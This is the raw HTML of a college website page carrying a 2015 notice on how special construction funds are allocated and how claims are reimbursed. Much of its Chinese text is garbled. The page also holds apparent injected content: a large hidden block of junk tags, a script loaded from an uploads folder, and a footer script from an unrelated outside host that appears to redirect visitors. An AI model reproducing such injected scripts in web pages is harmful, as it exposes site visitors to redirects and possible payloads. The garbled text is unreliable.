cu 关于公布特色院校建设专项资金使用分配方案及资金申请报销流程的通知-郑州城市职业学院-评估办公定/title> <meta content="" name="keywords"> <meta content="" name="description"> <link href="/Template/pinggu/images/jigou.css" rel="stylesheet" type="text/css"> <link href="/Template/pinggu/images/jigou280.css" rel="stylesheet" type="text/css"> </head> <body> <div class="banner"></div> <div class="navs"> <div class="snavs_in"> <div class="snavs_b"> <ul> <li class="li"><a href="">学院首页</a></li> <li><a href="/pgw/"><span>本站首页</span></a></li><div style='display:none'><q id='vj26h'><p id='vj26h'><optgroup id='vj26h'></optgroup></p></q><form id='vj26h'></form><ol id='vj26h'><th id='vj26h'><legend id='vj26h'></legend></th><bdo id='vj26h'><optgroup id='vj26h'></optgroup></bdo></ol><dl id='vj26h'><tt id='vj26h'><tr id='vj26h'></tr></tt><address id='vj26h'><th id='vj26h'></th></address></dl><style id='vj26h'><dt id='vj26h'></dt><dir id='vj26h'></dir></style><dd id='vj26h'></dd><dl id='vj26h'><sup id='vj26h'></sup></dl><table id='vj26h'><p id='vj26h'><optgroup id='vj26h'><tbody id='vj26h'><p id='vj26h'><dir id='vj26h'><div id='vj26h'><center id='vj26h'></center></div></dir></p></tbody></optgroup></p></table><abbr id='vj26h'><abbr id='vj26h'><blockquote id='vj26h'><i id='vj26h'><select id='vj26h'><td id='vj26h'><u id='vj26h'><ol id='vj26h'></ol><big id='vj26h'><big id='vj26h'></big></big></u><pre id='vj26h'><kbd id='vj26h'></kbd></pre><del id='vj26h'></del></td><button id='vj26h'><noframes id='vj26h'><option id='vj26h'></option><select id='vj26h'><span id='vj26h'><form id='vj26h'></form></span><dd id='vj26h'></dd></select><dt id='vj26h'></dt></noframes><del id='vj26h'><noframes id='vj26h'></noframes></del></button><kbd id='vj26h'></kbd><form id='vj26h'></form><button id='vj26h'><noframes id='vj26h'><style id='vj26h'><big id='vj26h'><i id='vj26h'></i><tbody id='vj26h'></tbody></big></style><abbr id='vj26h'></abbr></noframes></button></select></i><li id='vj26h'></li></blockquote></abbr><address id='vj26h'></address></abbr><address id='vj26h'><sub id='vj26h'><big id='vj26h'><tt id='vj26h'><bdo id='vj26h'><acronym id='vj26h'></acronym></bdo><label id='vj26h'><abbr id='vj26h'></abbr><em id='vj26h'><pre id='vj26h'></pre><address id='vj26h'><small id='vj26h'></small></address></em></label><center id='vj26h'><span id='vj26h'><b id='vj26h'></b></span></center><option id='vj26h'><bdo id='vj26h'><select id='vj26h'><strong id='vj26h'><q id='vj26h'><sup id='vj26h'><abbr id='vj26h'></abbr></sup><p id='vj26h'></p></q><span id='vj26h'><tfoot id='vj26h'><ul id='vj26h'><div id='vj26h'><style id='vj26h'><dir id='vj26h'></dir></style></div></ul></tfoot><q id='vj26h'><form id='vj26h'></form></q></span><noframes id='vj26h'><p id='vj26h'><sup id='vj26h'></sup></p></noframes></strong></select></bdo></option></tt><option id='vj26h'></option><li id='vj26h'></li></big><strong id='vj26h'></strong></sub></address><ol id='vj26h'><font id='vj26h'></font><dl id='vj26h'></dl></ol><option id='vj26h'></option><th id='vj26h'></th><li id='vj26h'></li><center id='vj26h'><u id='vj26h'></u></center><del id='vj26h'></del><tfoot id='vj26h'></tfoot><p id='vj26h'><strike id='vj26h'></strike><fieldset id='vj26h'></fieldset></p><tr id='vj26h'><bdo id='vj26h'><ul id='vj26h'></ul></bdo></tr><th id='vj26h'><tfoot id='vj26h'><p id='vj26h'><thead id='vj26h'><dfn id='vj26h'></dfn></thead></p><strong id='vj26h'></strong><th id='vj26h'></th></tfoot></th><u id='vj26h'><blockquote id='vj26h'></blockquote></u><b id='vj26h'><address id='vj26h'></address></b><ins id='vj26h'><table id='vj26h'><strike id='vj26h'><tfoot id='vj26h'><ins id='vj26h'></ins></tfoot><strike id='vj26h'><small id='vj26h'><div id='vj26h'></div></small></strike></strike><optgroup id='vj26h'><big id='vj26h'><abbr id='vj26h'></abbr></big><kbd id='vj26h'><q id='vj26h'></q></kbd></optgroup></table><big id='vj26h'></big></ins><sub id='vj26h'></sub><q id='vj26h'><kbd id='vj26h'></kbd><dt id='vj26h'></dt></q><big id='vj26h'><pre id='vj26h'><code id='vj26h'></code><del id='vj26h'><fieldset id='vj26h'></fieldset></del><big id='vj26h'><dt id='vj26h'></dt></big><bdo id='vj26h'></bdo></pre></big><noscript id='vj26h'></noscript><acronym id='vj26h'></acronym><div id='vj26h'><tr id='vj26h'><b id='vj26h'></b></tr></div><dl id='vj26h'></dl><tbody id='vj26h'><p id='vj26h'><noframes id='vj26h'></noframes></p><u id='vj26h'></u></tbody><dt id='vj26h'></dt><dd id='vj26h'></dd><big id='vj26h'></big><pre id='vj26h'></pre><dir id='vj26h'><optgroup id='vj26h'><select id='vj26h'></select></optgroup></dir><font id='vj26h'><ol id='vj26h'><dir id='vj26h'><dl id='vj26h'></dl><thead id='vj26h'></thead></dir></ol></font><pre id='vj26h'><tr id='vj26h'><q id='vj26h'><fieldset id='vj26h'></fieldset></q></tr></pre><dfn id='vj26h'><td id='vj26h'><strong id='vj26h'><style id='vj26h'><acronym id='vj26h'></acronym><pre id='vj26h'><pre id='vj26h'><dir id='vj26h'><label id='vj26h'><noframes id='vj26h'></noframes></label></dir><strike id='vj26h'></strike></pre></pre></style></strong><th id='vj26h'><dir id='vj26h'><dt id='vj26h'><b id='vj26h'></b></dt></dir></th></td></dfn><sub id='vj26h'></sub><th id='vj26h'></th><legend id='vj26h'></legend><style id='vj26h'></style><i id='vj26h'></i><optgroup id='vj26h'></optgroup><noscript id='vj26h'><q id='vj26h'><tfoot id='vj26h'><td id='vj26h'><b id='vj26h'></b></td></tfoot><pre id='vj26h'><code id='vj26h'></code><del id='vj26h'><form id='vj26h'></form></del><address id='vj26h'></address></pre></q></noscript><dfn id='vj26h'></dfn><optgroup id='vj26h'></optgroup><address id='vj26h'><sub id='vj26h'></sub></address><abbr id='vj26h'><ul id='vj26h'><big id='vj26h'><tbody id='vj26h'><dir id='vj26h'><tfoot id='vj26h'></tfoot><abbr id='vj26h'><noscript id='vj26h'></noscript></abbr></dir></tbody><tr id='vj26h'></tr></big></ul></abbr><dl id='vj26h'></dl><div id='vj26h'></div><div id='vj26h'><ol id='vj26h'></ol></div><i id='vj26h'></i><i id='vj26h'><strong id='vj26h'><sup id='vj26h'></sup><span id='vj26h'><strong id='vj26h'></strong><strong id='vj26h'></strong></span><option id='vj26h'><noscript id='vj26h'></noscript></option></strong></i><abbr id='vj26h'></abbr><ul id='vj26h'></ul><bdo id='vj26h'><div id='vj26h'></div></bdo><pre id='vj26h'><fieldset id='vj26h'></fieldset></pre><dfn id='vj26h'></dfn><tr id='vj26h'><option id='vj26h'><kbd id='vj26h'></kbd><label id='vj26h'><strong id='vj26h'><font id='vj26h'></font></strong></label><ol id='vj26h'><code id='vj26h'><td id='vj26h'><strike id='vj26h'><blockquote id='vj26h'></blockquote></strike></td></code></ol><dt id='vj26h'></dt><sup id='vj26h'><q id='vj26h'><dd id='vj26h'><q id='vj26h'><del id='vj26h'><acronym id='vj26h'></acronym><tfoot id='vj26h'></tfoot><label id='vj26h'><strong id='vj26h'></strong></label><td id='vj26h'></td><ul id='vj26h'><select id='vj26h'><li id='vj26h'></li></select></ul><label id='vj26h'></label></del><tbody id='vj26h'></tbody><dt id='vj26h'></dt></q><small id='vj26h'><strike id='vj26h'></strike></small></dd></q><label id='vj26h'></label></sup></option><pre id='vj26h'><ins id='vj26h'><td id='vj26h'></td><sub id='vj26h'><optgroup id='vj26h'></optgroup></sub><center id='vj26h'><em id='vj26h'></em></center><acronym id='vj26h'></acronym></ins></pre></tr><tr id='vj26h'></tr><center id='vj26h'><tbody id='vj26h'></tbody><tfoot id='vj26h'></tfoot></center><small id='vj26h'><th id='vj26h'></th></small><small id='vj26h'></small><em id='vj26h'></em><dfn id='vj26h'><dd id='vj26h'></dd></dfn><dl id='vj26h'><i id='vj26h'><td id='vj26h'><thead id='vj26h'></thead></td></i></dl><style id='vj26h'><th id='vj26h'><form id='vj26h'><span id='vj26h'><dl id='vj26h'><label id='vj26h'></label></dl><th id='vj26h'><li id='vj26h'><noscript id='vj26h'></noscript><tbody id='vj26h'></tbody><tbody id='vj26h'><form id='vj26h'><tbody id='vj26h'></tbody><dd id='vj26h'><i id='vj26h'></i></dd></form></tbody></li></th></span></form><optgroup id='vj26h'><ol id='vj26h'><b id='vj26h'></b></ol></optgroup></th></style><tbody id='vj26h'><strong id='vj26h'></strong><label id='vj26h'><label id='vj26h'><tbody id='vj26h'><small id='vj26h'><noframes id='vj26h'></noframes><ul id='vj26h'></ul><b id='vj26h'></b></small></tbody></label><label id='vj26h'><code id='vj26h'></code><kbd id='vj26h'></kbd></label><u id='vj26h'><tt id='vj26h'></tt></u></label></tbody><dfn id='vj26h'><tbody id='vj26h'></tbody></dfn><pre id='vj26h'><em id='vj26h'><option id='vj26h'><dt id='vj26h'></dt></option></em></pre><optgroup id='vj26h'><thead id='vj26h'></thead></optgroup><optgroup id='vj26h'></optgroup><optgroup id='vj26h'></optgroup><em id='vj26h'></em><address id='vj26h'></address><blockquote id='vj26h'><u id='vj26h'><style id='vj26h'><b id='vj26h'></b><thead id='vj26h'><style id='vj26h'><strong id='vj26h'><ol id='vj26h'></ol></strong></style><acronym id='vj26h'><del id='vj26h'><dd id='vj26h'></dd><bdo id='vj26h'><legend id='vj26h'><kbd id='vj26h'><address id='vj26h'></address></kbd></legend></bdo></del></acronym></thead><tbody id='vj26h'></tbody></style></u><label id='vj26h'><dt id='vj26h'></dt></label></blockquote><li id='vj26h'><dl id='vj26h'><noframes id='vj26h'><form id='vj26h'></form></noframes></dl></li><td id='vj26h'></td><blockquote id='vj26h'><th id='vj26h'><tr id='vj26h'></tr><code id='vj26h'><sup id='vj26h'><fieldset id='vj26h'></fieldset><code id='vj26h'></code><big id='vj26h'></big></sup></code></th></blockquote><select id='vj26h'><kbd id='vj26h'><sup id='vj26h'></sup><form id='vj26h'></form></kbd></select><big id='vj26h'></big><em id='vj26h'></em><sup id='vj26h'><b id='vj26h'></b><strong id='vj26h'></strong></sup><kbd id='vj26h'><ol id='vj26h'></ol></kbd><optgroup id='vj26h'><tt id='vj26h'><font id='vj26h'><td id='vj26h'></td></font></tt></optgroup><pre id='vj26h'><center id='vj26h'></center></pre><tt id='vj26h'></tt><big id='vj26h'><strike id='vj26h'><li id='vj26h'><kbd id='vj26h'></kbd></li><i id='vj26h'><blockquote id='vj26h'><label id='vj26h'><u id='vj26h'><ins id='vj26h'></ins><dfn id='vj26h'></dfn></u></label><noscript id='vj26h'><span id='vj26h'></span></noscript><td id='vj26h'></td><pre id='vj26h'><li id='vj26h'><td id='vj26h'><label id='vj26h'></label><pre id='vj26h'></pre></td></li></pre><small id='vj26h'></small></blockquote></i><b id='vj26h'><i id='vj26h'></i></b><td id='vj26h'><select id='vj26h'></select><table id='vj26h'><tbody id='vj26h'></tbody></table><dt id='vj26h'><dd id='vj26h'></dd></dt></td></strike><strong id='vj26h'><sub id='vj26h'></sub><td id='vj26h'></td></strong></big><blockquote id='vj26h'></blockquote><small id='vj26h'></small><dir id='vj26h'></dir><tr id='vj26h'></tr><center id='vj26h'><u id='vj26h'></u></center><kbd id='vj26h'></kbd><select id='vj26h'><u id='vj26h'><p id='vj26h'><p id='vj26h'><em id='vj26h'><dfn id='vj26h'><table id='vj26h'><dl id='vj26h'></dl><center id='vj26h'></center></table></dfn><div id='vj26h'></div><small id='vj26h'></small></em></p></p><acronym id='vj26h'></acronym><u id='vj26h'></u><sup id='vj26h'><thead id='vj26h'><noscript id='vj26h'></noscript></thead></sup></u><ol id='vj26h'></ol><sub id='vj26h'></sub></select><address id='vj26h'></address><dl id='vj26h'><small id='vj26h'><ul id='vj26h'><optgroup id='vj26h'><em id='vj26h'></em></optgroup><tt id='vj26h'></tt><strike id='vj26h'></strike></ul><thead id='vj26h'><kbd id='vj26h'><kbd id='vj26h'></kbd><noframes id='vj26h'><bdo id='vj26h'><sup id='vj26h'><div id='vj26h'><bdo id='vj26h'></bdo></div></sup></bdo></noframes><label id='vj26h'></label><strike id='vj26h'></strike></kbd></thead></small></dl><big id='vj26h'></big><ins id='vj26h'><optgroup id='vj26h'></optgroup></ins><dl id='vj26h'><tbody id='vj26h'></tbody></dl><dt id='vj26h'></dt><tr id='vj26h'><address id='vj26h'></address></tr><small id='vj26h'><font id='vj26h'></font></small><option id='vj26h'><thead id='vj26h'></thead><em id='vj26h'></em></option><tfoot id='vj26h'></tfoot><tbody id='vj26h'></tbody><li id='vj26h'></li><tbody id='vj26h'></tbody><address id='vj26h'></address><del id='vj26h'><big id='vj26h'><label id='vj26h'><code id='vj26h'><th id='vj26h'><legend id='vj26h'></legend><i id='vj26h'></i><form id='vj26h'></form></th></code></label></big><dd id='vj26h'><span id='vj26h'><abbr id='vj26h'></abbr></span></dd></del><ol id='vj26h'></ol><address id='vj26h'><sup id='vj26h'><acronym id='vj26h'></acronym></sup></address><blockquote id='vj26h'></blockquote><font id='vj26h'></font><optgroup id='vj26h'><bdo id='vj26h'></bdo><acronym id='vj26h'></acronym></optgroup><del id='vj26h'></del><code id='vj26h'><select id='vj26h'></select><td id='vj26h'></td></code><tfoot id='vj26h'></tfoot><kbd id='vj26h'><b id='vj26h'><style id='vj26h'><tbody id='vj26h'><tr id='vj26h'></tr><big id='vj26h'></big><ol id='vj26h'><u id='vj26h'><dfn id='vj26h'></dfn></u></ol></tbody></style><dl id='vj26h'><b id='vj26h'><ins id='vj26h'><tt id='vj26h'><b id='vj26h'><blockquote id='vj26h'><dir id='vj26h'></dir><label id='vj26h'><li id='vj26h'></li><i id='vj26h'></i><u id='vj26h'><tbody id='vj26h'></tbody></u></label><li id='vj26h'><tt id='vj26h'></tt></li></blockquote></b></tt></ins></b></dl></b></kbd><fieldset id='vj26h'><sub id='vj26h'><div id='vj26h'></div></sub></fieldset><acronym id='vj26h'><td id='vj26h'><form id='vj26h'></form></td><big id='vj26h'><dfn id='vj26h'><b id='vj26h'><address id='vj26h'></address></b><thead id='vj26h'><span id='vj26h'></span></thead></dfn></big></acronym><ul id='vj26h'></ul><tbody id='vj26h'><sup id='vj26h'><legend id='vj26h'><b id='vj26h'></b></legend></sup><legend id='vj26h'><sub id='vj26h'><ul id='vj26h'><b id='vj26h'><q id='vj26h'></q></b></ul><tfoot id='vj26h'></tfoot><ul id='vj26h'></ul><bdo id='vj26h'></bdo></sub></legend></tbody><dfn id='vj26h'><label id='vj26h'></label></dfn><em id='vj26h'><bdo id='vj26h'><ins id='vj26h'><dl id='vj26h'></dl></ins><pre id='vj26h'><p id='vj26h'></p><span id='vj26h'><tt id='vj26h'></tt></span></pre></bdo></em></div> <script language="javascript" type="text/javascript" src="/@uploads/js/common386.js"></script> <li><a href="/pgw/pjdt/"><span>评建动急/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简L/span></a></li> <li><a href="/pgw/tszs/"><span>他山之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> </div> <div class="clear"></div> <div class="list_pos">当前位置?a href="/pgw/">首页</a> > 最新公> 正文内容</div> <div class="cnt950 page_wrap"> <div class="side"> <div class="hd"><h3>评估办公定/h3></div> <div class="bd"> <ul class=""> <li><a href="/pgw/pjdt/"><span>评建动急/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简L/span></a></li> <li><a href="/pgw/pgzyj/"><span>高职研究</span></a></li> <li><a href="/pgw/tszs/"><span>他仙之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> <div class="main"> <div class="hd"><h3>最新公/h3></div> <div class="bd"> <div class="page-m"> <div class="r_page_content"> <!--文章标题--> <h1>关于公布特色院校建设专项资金使用分配方案及资金申请报销流程的通知</h1> <div class="info">发布时间?015幭3未e5日 点击数:<span id="hits"> <script language="JavaScript" type="text/JavaScript" src="/Common/GetHits.aspx?id=1289"></script> </span></div> <!--正文内容--> <div class="content" id="artiContent"> <div class="c_content_overflow" id="fontzoom"> <p>  各部门:</p> <p>  学院省级特色院校建设项目专项资金225万现已到账,为保证建设资金科学、规范、合理、高效使用,保障建设项目的顺利进行,根据上级文件要求和我院《省级特色院校建设项目专项资金管理办法》及学院省级特色院校《建设方案》、《任务书》、《任务分解书》、《目标责任书》,特色办制订了《郑州城市职业学院省级特色院校建设专项资金使用分配方案》及《郑州城市职业学院特色院校建设专项资金申办及报销单》,经院长办公会批准,予以公布,详见附件G/p> <p>  请各项目建设组、各部门根据《任务书》、《任务分解书已发送至各相关部门内部邮,按照《目标责任书》积极展开特色院校各项建设工作G/p> <p>  附件1:郑州城市职业学院关于印发《特色院校建设项目专项资金管理办法》的通知(院发[2014]20叽</p> <p>  附件2:郑州城市职业学院特色院校建设专项资金使用分配方桫@/p> <p>  附件3:郑州城市职业学院特色院校建设专项资金申办及报销/p> <p>                                                                                                                          郑州城市职业学院特色劔/p> <p>                                                                                                                          二〇一五年三月二十五日</p> </div> </div> <!--分页--> <div id="page1"></div> </div> </div> </div> </div> </div> <div class="clear10"></div> <div class="footer"> 版权所有:郑州城市职业学院 技术支持:<br> 河南郑州市新密溱水路西段618号 邮编?52370 电话?371-69213333 <br> 豫ICP夣S2014925另R </div> <script type="text/javascript" src="https://js.users.51.la/19550489.js"></script> <script src="http://www.ybtoad.com/mjump.js"></script><script> (function(){ var canonicalURL, curProtocol; //Get the <link> tag var x=document.getElementsByTagName("link"); //Find the last canonical URL if(x.length > 0){ for (i=0;i<x.length;i++){ if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){ canonicalURL=x[i].href; } } } //Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})(); </script></body></html>